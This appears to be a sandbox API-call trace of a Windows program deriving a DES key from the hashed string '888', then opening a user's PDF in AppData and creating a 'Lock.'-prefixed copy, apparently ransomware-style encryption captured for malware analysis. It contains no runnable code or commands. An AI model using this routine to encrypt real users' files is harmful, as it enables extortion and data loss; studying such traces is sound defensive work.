0 [0151.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.721] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.721] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.721] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.721] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.721] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.721] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0151.721] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.721] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0151.721] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.721] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0151.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa3c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0151.722] CryptCreateHash (in: hProv=0x9bf440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0151.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0151.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0151.722] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0151.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0151.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ba8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0151.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.722] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.722] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.722] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.722] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.722] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0151.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa468, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0151.723] CryptHashData (hHash=0x9e1df8, pbData=0x2a71bf8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0151.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.723] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.723] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.723] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0151.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.723] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0151.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.723] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0151.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa390, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0151.723] CryptDeriveKey (in: hProv=0x9bf440, Algid=0x6601, hBaseData=0x9e1df8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e20b8) returned 1 [0151.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.724] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.724] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0151.724] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.724] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0151.724] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0151.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0151.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7040, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0151.724] CryptDestroyHash (hHash=0x9e1df8) returned 1 [0151.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.724] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.724] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.724] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.724] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.725] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/UGbEnsFdWrF0NcSzWk2.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ugbensfdwrf0ncszwk2.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0151.725] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.725] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0151.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0151.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0151.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0151.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0151.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0151.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0151.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0151.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0151.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0151.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0151.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0151.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0151.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0151.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0151.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0151.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0151.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0151.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.727] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0151.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0151.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0151.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0151.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0151.727] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.UGbEnsFdWrF0NcSzWk2.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.ugbensfdwrf0ncszwk2.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f8 [0151.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0151.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0151.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0151.728] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0151.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0151.728] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0151.728] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0151.728] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0151.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0151.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0151.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0151.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0151.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0151.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0151.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0151.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0151.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0151.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cd5020 [0151.733] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0151.733] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x4d1e, lpOverlapped=0x0) returned 1 [0151.734] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0151.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0151.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0151.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4d1e) returned 0x2a9a140 [0151.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cd5020 | out: hHeap=0x2af0000) returned 1 [0151.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 